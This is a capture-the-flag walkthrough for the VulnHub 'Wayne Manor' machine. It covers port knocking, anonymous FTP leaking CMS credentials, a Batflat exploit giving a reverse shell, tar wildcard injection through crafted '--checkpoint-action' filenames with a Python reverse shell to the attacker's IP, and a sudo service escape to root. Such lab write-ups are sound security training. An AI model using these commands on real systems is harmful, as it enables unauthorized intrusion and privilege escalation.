http://www.vulnhub.com/entry/wayne-manor-1,681/
Read GUIDELINES.txt in unziped files.
GUIDELINES: Add '<ip> waynemanor.com' to the '/etc/hosts' file. DHCP is ON. Enjoy! You can follow me on Twitter (@sec_balkan), in GitHub (@sec-balkan), or send me a message on Telegram (@sec_balkan).
Add <ip> waynemanor.com to /etc/hosts. (Important!)
Scan ports.
nmap -sV -sC -p- 192.168.33.137 -oN ports.log
Scan port 80, no need to wait to end.
Check /blog, see some hints. It means knock-knock 300, 350, 400 ports, we will get FTP.
Knock it. And scan port again.
knock 192.168.33.137 300 350 400
Login ftp as anonymous, get info.txt, check it, get cms credentials.
The cms is batflat, search exploit.
Listen at one terminal, and run the POC at another terminal, get reverse shell.
nc -nlvp 1234 python3 49573.py http://waynemanor.com/ bruce alfred_help_me 192.168.33.128 1234
In /home/batman/.web/, found script.sh.
If we use pspy64 to check, we will see crontab runs script.sh each minute.
It is tar wildcard exploit. In order to escalate to user "batman", we need create 3 files in /var/www/html.
echo '' > --checkpoint=1 echo '' > --checkpoint-action=exec=sh pwn.sh cat<<EOF>pwn.sh python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.33.128",2234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' EOF
Then we listen at port 2234, and will get reverse shell of user "batman"
Check sudo -l.
Use /usr/sbin/service to get root.
sudo service ../../bin/sh